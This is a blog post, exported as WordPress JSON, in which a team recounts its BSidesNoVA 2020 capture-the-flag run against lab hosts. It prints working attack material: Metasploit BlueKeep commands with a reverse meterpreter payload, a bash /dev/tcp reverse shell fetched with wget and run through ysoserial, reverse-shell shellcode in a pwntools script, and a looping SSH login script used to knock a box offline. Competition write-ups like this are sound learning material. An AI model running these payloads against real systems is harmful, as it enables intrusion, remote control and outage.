{"id":588,"date":"2020-03-08T20:51:05","date_gmt":"2020-03-08T20:51:05","guid":{"rendered":"https:\/\/zineausa.com\/blog\/?p=588"},"modified":"2020-03-09T13:16:57","modified_gmt":"2020-03-09T13:16:57","slug":"bsidesnova-advanced-ctf-write-up","status":"publish","type":"post","link":"https:\/\/zineausa.com\/blog\/2020\/03\/bsidesnova-advanced-ctf-write-up\/","title":{"rendered":"BSidesNoVA Advanced CTF Write-up"},"content":{"rendered":"\n

I am an active member of NoVA Hackers<\/a> and one of the members asked if I would participate in the advanced CTF at BSidesNoVA<\/a>, so I did! This is a simple write-up to describe the approach we took for this competition. See below for the event description:<\/p>\n\n\n\n

For the advanced players, Arash is returning with another installment of the all-new, all-custom, Pro-Level CTF with a cash prize for the winning team of $2,500. This CTF is a highly realistic, challenging CTF requiring expert skills both on offense and defense. This year\u2019s twist will be an embedded APT. Once the players get on the boxes, they will have to do some forensics to ensure no one else is already there. Other players will have to evict the other actors (other players and the game\u2019s APT) and close their backdoor to keep their access and continue earning points. This excellent and engaging gameplay is a 2-day team event [03.06.20 10:00AM \u2013 03.07.20 4:00PM] <\/strong><\/p>\n\n\n\n

We completed the event in second place. Our team consisted of four people, two NoVA Hackers members and two strangers who we teamed up with two at the event, they were actually pretty good! See below for the final screenshot.<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

We solved about half the boxes, but much of our time was spent on breaking into the same boxes and keeping our foothold on them. <\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

There were a total of 9 IPs which were in scope for the competition, please see below for the write-up for each of them. Apologies in advance if there are few details for some of them, we didn’t have much time to keep great notes during the competition.<\/p>\n\n\n\n

10.100.100.20<\/strong><\/p>\n\n\n\n

3 Ports were open, but we didn’t get into this box.<\/p>\n\n\n\n

The name of the box was called: HANS-021E7B2664 <\/p>\n\n\n\n

PORT STATE SERVICE<\/strong>
135\/tcp open msrpc
139\/tcp open netbios-ssn
445\/tcp filtered microsoft-ds <\/p>\n\n\n\n

10.100.100.25 – 27<\/strong><\/p>\n\n\n\n

We ran nmap and found the following ports open:<\/p>\n\n\n\n

Starting Nmap 7.80 ( https:\/\/nmap.org<\/a> ) at 2020-03-07 10:30 EST
Nmap scan report for 10.100.100.26
Host is up (0.0096s latency).
Not shown: 65521 closed ports
PORT STATE SERVICE
135\/tcp open msrpc
139\/tcp open netbios-ssn
445\/tcp open microsoft-ds
554\/tcp open rtsp
2869\/tcp open icslap
3389\/tcp open ms-wbt-server
5357\/tcp open wsdapi
10243\/tcp open unknown
49152\/tcp open unknown
49153\/tcp open unknown
49154\/tcp open unknown
49156\/tcp open unknown
49158\/tcp open unknown
49179\/tcp open unknown <\/p>\n\n\n\n

These boxes were all very similar and had a hint that the box had something to do with “blue.” It wasn’t EternalBlue so we tried Bluekeep. <\/p>\n\n\n\n

Metasploit has a module for this, so we leveraged that and ran the following commands to exploit the box:<\/p>\n\n\n\n

use exploit\/windows\/rdp\/cve_2019_0708_bluekeep_rce \nset RDP_CLIENT_IP 10.50.50.103 [this was our IP] \nunset RDP_CLIENT_NAME set \nRHOSTS 10.100.100.25 set\nset payload windows\/x64\/meterpreter\/reverse_tcp\nSET LPORT  10.50.50.103 [this was our IP]  \nSET LHOST 443\ntarget 1\nexploit<\/pre>\n\n\n\n
Once we were in we automatically patched the host for the vulnerability with the following command.<\/p>\n\n\n\n
reg add “HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp” -v UserAuthentication -t REG_DWORD -d 00000001<\/p>\n\n\n\n
All the boxes were vulnerable to this exact same script except that the target needed to be set to “2” for 10.100.100.26 as I think it was running a slightly different OS.<\/p>\n\n\n\n
Once we were in we migrated to a host that was harder to kill for persistence.<\/p>\n\n\n\n
This was done within metasploit with migrate “pid” after we ran ps to find the processes running<\/p>\n\n\n\n
We looked for the C2 agent that Arash (the organizer) was running on the machines, it was called AgentService.exe and was summoned repetitively by a powerscript shell, which we also killed.  Otherwise we found that Arash would occasionally stop our point capture or kick us off the machines.<\/p>\n\n\n\n
The flag was found here:<\/p>\n\n\n\n
 C:\\Users\\Teddy\\Desktop>type flag.txt.txt
type flag.txt.txt
flag{AuYqvHtdtwYiI8c1SdUm} <\/p>\n\n\n\n
At that point, we ran the capture agent to capture “King of the Hill” points for our team.<\/p>\n\n\n\n
10.100.100.30<\/strong><\/p>\n\n\n\n
We ran a nmap scan on this host and found the following ports open:<\/p>\n\n\n\n
Nmap scan report for 10.100.100.30
Host is up (0.013s latency).
Not shown: 91 closed ports
PORT      STATE    SERVICE
135\/tcp   open     msrpc
139\/tcp   open     netbios-ssn
445\/tcp   filtered microsoft-ds
5357\/tcp  open     wsdapi
47281\/tcp open     remoting 
49152\/tcp open     unknown
49153\/tcp open     unknown
49154\/tcp open     unknown
49156\/tcp open     unknown
49157\/tcp open     unknown 
<\/p>\n\n\n\n
We did a detailed scan on 47281 and found the following:<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
A hint was given to use this exploit<\/a>, which I compiled and ran, except we need a service name to use it, which is where we got stuck.<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
10.100.100.35<\/strong><\/p>\n\n\n\n
 We ran a nmap scan on the host and see below for the output!<\/p>\n\n\n\n
nmap scan report for 10.100.100.35
Host is up (0.018s latency).
Not shown: 999 closed ports
PORT     STATE SERVICE  VERSION
1099\/tcp open  java-rmi Java RMI
Device type: general purpose
Running: Linux 4.X
OS CPE: cpe:\/o:linux:linux_kernel:4.4
OS details: Linux 4.4
Uptime guess: 5.514 days (since Sat Feb 29 22:15:52 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zerosTRACEROUTE (using port 1720\/tcp)
HOP RTT      ADDRESS
–   Hop 1 is the same as for 10.100.100.30
2   14.17 ms 10.100.100.35 <\/p>\n\n\n\n
The hint was “why so serious” and with that, we found an exploit here <\/a>for a java serialization exploit.<\/p>\n\n\n\n
I made a simple shell file with a bash reverse shell (test.sh) inside it:<\/p>\n\n\n\n
#!\/bin\/bash
bash -i >& \/dev\/tcp\/10.100.100.35\/589 0>&1<\/p>\n\n\n\n
This was hosted with python.. and then we sent the command to remotely execute the shell which we caught with netcat (the following 4 commands)<\/p>\n\n\n\n
nc -lvnp 589 (to listen for the reverse shell)
python -m SimpleHTTPServer 8888 (to host the shell)
sudo java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit 10.100.100.35 1099 Jdk7u21 “wget 10.50.50.103:8888\/test.sh” (to upload the shell)
sudo java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit 10.100.100.35 1099 Jdk7u21 “bash test.sh”  (to run the shell)<\/p>\n\n\n\n
We found the flag and ran the capture agent to start scoring.<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
10.100.100.40 <\/strong><\/p>\n\n\n\n
This was a webapp, nmap scan below:<\/p>\n\n\n\n
Nmap scan report for 10.100.100.40
Host is up (0.0054s latency).
Not shown: 97 closed ports
PORT     STATE SERVICE
22\/tcp   open  ssh
80\/tcp   open  http
3000\/tcp open  ppp <\/p>\n\n\n\n
Nikto was unhelpful:<\/p>\n\n\n\n
 – Nikto v2.1.6
—————————————————————————
+ Target IP:          10.100.100.40
+ Target Hostname:    10.100.100.40
+ Target Port:        3000
+ Start Time:         2020-03-06 10:33:50 (GMT0)
—————————————————————————
+ Server: No banner retrieved
+ Retrieved x-powered-by header: Express
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use ‘-C all’ to force check all possible dirs)
+ Allowed HTTP Methods: GET, HEAD
+ 7893 requests: 0 error(s) and 5 item(s) reported on remote host
+ End Time:           2020-03-06 10:35:35 (GMT0) (105 seconds)
————————————————————————— <\/p>\n\n\n\n
However, if you looked on the page, there was a file named dotnet\/src\/Vuln.js which listed the password of 9yzlmE5BffL9x4ERzfA <\/p>\n\n\n\n
There was a flag in the \/etc\/passwd file:<\/p>\n\n\n\n
cat \/etc\/password
… blah blah blah…
sshd:121:65534::\/var\/run\/sshd:\/usr\/sbin\/nologin
flag:flag{Z1yqXE5H0gzyYlkTaLrU}:1001:1001:,,,:\/home\/flag:\/bin\/bash <\/p>\n\n\n\n
Another one on the user’s desktop:<\/p>\n\n\n\n
 jefe@ubuntu:~\/Desktop$ cat flag.txt
flag{Fqg2qul66bhIms8DlSMa} <\/p>\n\n\n\n
and one in  Vuln.js <\/p>\n\n\n\n
 flag{RIxKc9xaHtPd6IgUKnnh}<\/p>\n\n\n\n
10.100.100.45 – 46<\/strong><\/p>\n\n\n\n
We ran a nmap on these hosts:<\/p>\n\n\n\n
Nmap scan report for 10.100.100.45
Host is up (0.0052s latency).
Not shown: 99 closed ports
PORT   STATE SERVICE
22\/tcp open  ssh <\/p>\n\n\n\n
The hint on these hosts was that the password was default “toor”, this was a freebie.<\/p>\n\n\n\n
We used a script to automatically change the password to one that we chose. <\/p>\n\n\n\n
We put this in a.bash and ran the following to have it constantly try to login and change the password, since Arash kept resetting the boxes at a fixed interval. At one point we were running these scripts too hard and that crashed the SSH service on them.. oops.<\/p>\n\n\n\n
 bash a.bash & sleep 0.2 & bash a.bash & sleep 0.2 & bash a.bash & sleep 0.2 & bash a.bash & sleep 0.2 & bash a.bash & sleep 0.2 & bash a.bash & sleep 0.2 & bash a.bash & sleep 0.2 & bash a.bash & sleep 0.2 <\/p>\n\n\n\n
Our accidental DOS also affected the capture agent so we wrote a similar script to continuously attempt to capture points for us.<\/p>\n\n\n\n
 10.100.100.50<\/strong><\/p>\n\n\n\n
This was a buffer overflow box, but see nmap below for open ports:<\/p>\n\n\n\n
Nmap scan report for 10.100.100.50
Host is up (0.0081s latency).
Not shown: 99 closed ports
PORT   STATE SERVICE
80\/tcp open  http 
3000\/tcp open unknown<\/p>\n\n\n\n
We attempted to use pwn to make an exploit but we just didn’t have enough time to figure out the BOF.. see below for the python script we used to DOS the box instead (if we didn’t get it, the other team wasn’t going to either!)<\/p>\n\n\n\n
from pwn import *
 context(os=”linux”, arch=”amd64″)
 HOST, PORT = “10.100.100.50” , 3000
 p = remote (HOST, PORT)
 p.recvuntil(“data”) 
buf = “”
 buf += “\\x6a\\x29\\x58\\x99\\x6a\\x02\\x5f\\x6a\\x01\\x5e\\x0f\\x05\\x48”
 buf += “\\x97\\x48\\xb9\\x02\\x00\\x1e\\x61\\x7f\\x00\\x00\\x01\\x51\\x48”
 buf += “\\x89\\xe6\\x6a\\x10\\x5a\\x6a\\x2a\\x58\\x0f\\x05\\x6a\\x03\\x5e”
 buf += “\\x48\\xff\\xce\\x6a\\x21\\x58\\x0f\\x05\\x75\\xf6\\x6a\\x3b\\x58”
 buf += “\\x99\\x48\\xbb\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x00\\x53\\x48”
 buf += “\\x89\\xe7\\x52\\x57\\x48\\x89\\xe6\\x0f\\x05”
 p.sendline(“\\x90”50+buf+”\\x41″<\/em>44+”\/x90\/xe0\/xff\/xff\/xff\/7f”) <\/p>\n\n\n\n
10.100.100.51<\/strong><\/p>\n\n\n\n
Similar to the one hosted on port 50, this was a “hard” buffer overflow with some sort of overflow detection enabled. Nmap scan below:<\/p>\n\n\n\n
Nmap scan report for 10.100.100.51
Host is up (0.019s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE VERSION
80\/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache\/2.4.18 (Ubuntu)
|_http-title: Site doesn’t have a title (text\/html).
5000\/tcp open  upnp?
| fingerprint-strings:
|   DNSStatusRequestTCP:
|     What would you like me to echo back?
|     put: Ok, now what?
|   DNSVersionBindReqTCP:
|     What would you like me to echo back?
|     put: Ok, now what?
|     Thanks!
|   GenericLines:
|     What would you like me to echo back?
|     put:
|     what?
|   GetRequest:
|     What would you like me to echo back?
|     put: GET \/ HTTP\/1.0
|     what?
|   HTTPOptions:
|     What would you like me to echo back?
|     put: OPTIONS \/ HTTP\/1.0
|     what?
|   Help:
|     What would you like me to echo back?
|     put: HELP
|     what?
|   NULL:
|     What would you like me to echo back?
|   RPCCheck, SSLSessionReq, TerminalServerCookie:
|     What would you like me to echo back?
|     put:
|     what?
|     Thanks!
|     really are trying to bypass my canary?
|   RTSPRequest:
|     What would you like me to echo back?
|     put: OPTIONS \/ RTSP\/1.0
|     what?
|   SMBProgNeg, ZendJavaBridge:
|     What would you like me to echo back?
|     put: Ok, now what?
|     Thanks!
|_    really are trying to bypass my canary? <\/p>\n\n\n\n
We didn’t have time to work on this BOF nor did we try to write a script to DOS it.<\/p>\n\n\n\n
Overall, it was a fun event that taught us a bunch about persistence and hunting for enemy shells & backdoors. Thank you Arash and the rest of the BsidesNOVA team for hosting this great event!<\/p>\n","protected":false},"excerpt":{"rendered":"
I am an active member of NoVA Hackers and one of the members asked if I would participate in the advanced CTF at BSidesNoVA, so I did! This is a simple write-up to describe the approach we took for this competition. See below for the event description: For the advanced players, Arash is returning with […]<\/p>\n","protected":false},"author":1,"featured_media":609,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[23],"class_list":["post-588","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-writeups","tag-ctf"],"yoast_head":"\nBSidesNoVA Advanced CTF Write-up - Zinea InfoSec Blog<\/title>\n<meta name=\"description\" content=\"... % BSidesNoVA Advanced CTF Write-up\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zineausa.com\/blog\/2020\/03\/bsidesnova-advanced-ctf-write-up\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"BSidesNoVA Advanced CTF Write-up - Zinea InfoSec Blog\" \/>\n<meta property=\"og:description\" content=\"... % BSidesNoVA Advanced CTF Write-up\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zineausa.com\/blog\/2020\/03\/bsidesnova-advanced-ctf-write-up\/\" \/>\n<meta property=\"og:site_name\" content=\"Zinea InfoSec Blog\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/zineausa\/\" \/>\n<meta property=\"article:published_time\" content=\"2020-03-08T20:51:05+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2020-03-09T13:16:57+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2020\/03\/bsidesnova2020-1.png\" \/>\n\t<meta property=\"og:image:width\" content=\"300\" \/>\n\t<meta property=\"og:image:height\" content=\"200\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Zinea\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@ZineaLLC\" \/>\n<meta name=\"twitter:site\" content=\"@ZineaLLC\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Zinea\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"9 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/2020\\\/03\\\/bsidesnova-advanced-ctf-write-up\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/2020\\\/03\\\/bsidesnova-advanced-ctf-write-up\\\/\"},\"author\":{\"name\":\"Zinea\",\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/#\\\/schema\\\/person\\\/e3c58d4f0650f7fb571c01fcf836b1d0\"},\"headline\":\"BSidesNoVA Advanced CTF Write-up\",\"datePublished\":\"2020-03-08T20:51:05+00:00\",\"dateModified\":\"2020-03-09T13:16:57+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/2020\\\/03\\\/bsidesnova-advanced-ctf-write-up\\\/\"},\"wordCount\":1807,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/2020\\\/03\\\/bsidesnova-advanced-ctf-write-up\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/wp-content\\\/uploads\\\/2020\\\/03\\\/bsidesnova2020-1.png\",\"keywords\":[\"ctf\"],\"articleSection\":[\"Writeups\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zineausa.com\\\/blog\\\/2020\\\/03\\\/bsidesnova-advanced-ctf-write-up\\\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/2020\\\/03\\\/bsidesnova-advanced-ctf-write-up\\\/\",\"url\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/2020\\\/03\\\/bsidesnova-advanced-ctf-write-up\\\/\",\"name\":\"BSidesNoVA Advanced CTF Write-up - Zinea InfoSec Blog\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/2020\\\/03\\\/bsidesnova-advanced-ctf-write-up\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/2020\\\/03\\\/bsidesnova-advanced-ctf-write-up\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/wp-content\\\/uploads\\\/2020\\\/03\\\/bsidesnova2020-1.png\",\"datePublished\":\"2020-03-08T20:51:05+00:00\",\"dateModified\":\"2020-03-09T13:16:57+00:00\",\"description\":\"... % BSidesNoVA Advanced CTF Write-up\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/2020\\\/03\\\/bsidesnova-advanced-ctf-write-up\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zineausa.com\\\/blog\\\/2020\\\/03\\\/bsidesnova-advanced-ctf-write-up\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/2020\\\/03\\\/bsidesnova-advanced-ctf-write-up\\\/#primaryimage\",\"url\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/wp-content\\\/uploads\\\/2020\\\/03\\\/bsidesnova2020-1.png\",\"contentUrl\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/wp-content\\\/uploads\\\/2020\\\/03\\\/bsidesnova2020-1.png\",\"width\":300,\"height\":200},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/2020\\\/03\\\/bsidesnova-advanced-ctf-write-up\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"BSidesNoVA Advanced CTF Write-up\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/\",\"name\":\"Zinea InfoSec Blog\",\"description\":\"Cyber Security Resources\",\"publisher\":{\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/#organization\",\"name\":\"Zinea LLC\",\"url\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/wp-content\\\/uploads\\\/2018\\\/05\\\/zinea-square.png\",\"contentUrl\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/wp-content\\\/uploads\\\/2018\\\/05\\\/zinea-square.png\",\"width\":876,\"height\":876,\"caption\":\"Zinea LLC\"},\"image\":{\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/zineausa\\\/\",\"https:\\\/\\\/x.com\\\/ZineaLLC\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/#\\\/schema\\\/person\\\/e3c58d4f0650f7fb571c01fcf836b1d0\",\"name\":\"Zinea\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/81f66095634a4c974693824dc72cd0db7c7c44910d60dda2d1bf1be275ee107d?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/81f66095634a4c974693824dc72cd0db7c7c44910d60dda2d1bf1be275ee107d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/81f66095634a4c974693824dc72cd0db7c7c44910d60dda2d1bf1be275ee107d?s=96&d=mm&r=g\",\"caption\":\"Zinea\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"BSidesNoVA Advanced CTF Write-up - Zinea InfoSec Blog","description":"... % BSidesNoVA Advanced CTF Write-up","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zineausa.com\/blog\/2020\/03\/bsidesnova-advanced-ctf-write-up\/","og_locale":"en_US","og_type":"article","og_title":"BSidesNoVA Advanced CTF Write-up - Zinea InfoSec Blog","og_description":"... % BSidesNoVA Advanced CTF Write-up","og_url":"https:\/\/zineausa.com\/blog\/2020\/03\/bsidesnova-advanced-ctf-write-up\/","og_site_name":"Zinea InfoSec Blog","article_publisher":"https:\/\/www.facebook.com\/zineausa\/","article_published_time":"2020-03-08T20:51:05+00:00","article_modified_time":"2020-03-09T13:16:57+00:00","og_image":[{"width":300,"height":200,"url":"https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2020\/03\/bsidesnova2020-1.png","type":"image\/png"}],"author":"Zinea","twitter_card":"summary_large_image","twitter_creator":"@ZineaLLC","twitter_site":"@ZineaLLC","twitter_misc":{"Written by":"Zinea","Est. reading time":"9 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zineausa.com\/blog\/2020\/03\/bsidesnova-advanced-ctf-write-up\/#article","isPartOf":{"@id":"https:\/\/zineausa.com\/blog\/2020\/03\/bsidesnova-advanced-ctf-write-up\/"},"author":{"name":"Zinea","@id":"https:\/\/zineausa.com\/blog\/#\/schema\/person\/e3c58d4f0650f7fb571c01fcf836b1d0"},"headline":"BSidesNoVA Advanced CTF Write-up","datePublished":"2020-03-08T20:51:05+00:00","dateModified":"2020-03-09T13:16:57+00:00","mainEntityOfPage":{"@id":"https:\/\/zineausa.com\/blog\/2020\/03\/bsidesnova-advanced-ctf-write-up\/"},"wordCount":1807,"commentCount":0,"publisher":{"@id":"https:\/\/zineausa.com\/blog\/#organization"},"image":{"@id":"https:\/\/zineausa.com\/blog\/2020\/03\/bsidesnova-advanced-ctf-write-up\/#primaryimage"},"thumbnailUrl":"https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2020\/03\/bsidesnova2020-1.png","keywords":["ctf"],"articleSection":["Writeups"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zineausa.com\/blog\/2020\/03\/bsidesnova-advanced-ctf-write-up\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zineausa.com\/blog\/2020\/03\/bsidesnova-advanced-ctf-write-up\/","url":"https:\/\/zineausa.com\/blog\/2020\/03\/bsidesnova-advanced-ctf-write-up\/","name":"BSidesNoVA Advanced CTF Write-up - Zinea InfoSec Blog","isPartOf":{"@id":"https:\/\/zineausa.com\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/zineausa.com\/blog\/2020\/03\/bsidesnova-advanced-ctf-write-up\/#primaryimage"},"image":{"@id":"https:\/\/zineausa.com\/blog\/2020\/03\/bsidesnova-advanced-ctf-write-up\/#primaryimage"},"thumbnailUrl":"https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2020\/03\/bsidesnova2020-1.png","datePublished":"2020-03-08T20:51:05+00:00","dateModified":"2020-03-09T13:16:57+00:00","description":"... % BSidesNoVA Advanced CTF Write-up","breadcrumb":{"@id":"https:\/\/zineausa.com\/blog\/2020\/03\/bsidesnova-advanced-ctf-write-up\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zineausa.com\/blog\/2020\/03\/bsidesnova-advanced-ctf-write-up\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zineausa.com\/blog\/2020\/03\/bsidesnova-advanced-ctf-write-up\/#primaryimage","url":"https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2020\/03\/bsidesnova2020-1.png","contentUrl":"https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2020\/03\/bsidesnova2020-1.png","width":300,"height":200},{"@type":"BreadcrumbList","@id":"https:\/\/zineausa.com\/blog\/2020\/03\/bsidesnova-advanced-ctf-write-up\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zineausa.com\/blog\/"},{"@type":"ListItem","position":2,"name":"BSidesNoVA Advanced CTF Write-up"}]},{"@type":"WebSite","@id":"https:\/\/zineausa.com\/blog\/#website","url":"https:\/\/zineausa.com\/blog\/","name":"Zinea InfoSec Blog","description":"Cyber Security Resources","publisher":{"@id":"https:\/\/zineausa.com\/blog\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zineausa.com\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zineausa.com\/blog\/#organization","name":"Zinea LLC","url":"https:\/\/zineausa.com\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zineausa.com\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/05\/zinea-square.png","contentUrl":"https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/05\/zinea-square.png","width":876,"height":876,"caption":"Zinea LLC"},"image":{"@id":"https:\/\/zineausa.com\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/zineausa\/","https:\/\/x.com\/ZineaLLC"]},{"@type":"Person","@id":"https:\/\/zineausa.com\/blog\/#\/schema\/person\/e3c58d4f0650f7fb571c01fcf836b1d0","name":"Zinea","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/81f66095634a4c974693824dc72cd0db7c7c44910d60dda2d1bf1be275ee107d?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/81f66095634a4c974693824dc72cd0db7c7c44910d60dda2d1bf1be275ee107d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/81f66095634a4c974693824dc72cd0db7c7c44910d60dda2d1bf1be275ee107d?s=96&d=mm&r=g","caption":"Zinea"}}]}},"_links":{"self":[{"href":"https:\/\/zineausa.com\/blog\/wp-json\/wp\/v2\/posts\/588","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zineausa.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zineausa.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zineausa.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zineausa.com\/blog\/wp-json\/wp\/v2\/comments?post=588"}],"version-history":[{"count":15,"href":"https:\/\/zineausa.com\/blog\/wp-json\/wp\/v2\/posts\/588\/revisions"}],"predecessor-version":[{"id":611,"href":"https:\/\/zineausa.com\/blog\/wp-json\/wp\/v2\/posts\/588\/revisions\/611"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/zineausa.com\/blog\/wp-json\/wp\/v2\/media\/609"}],"wp:attachment":[{"href":"https:\/\/zineausa.com\/blog\/wp-json\/wp\/v2\/media?parent=588"}],"wp:term":[{"t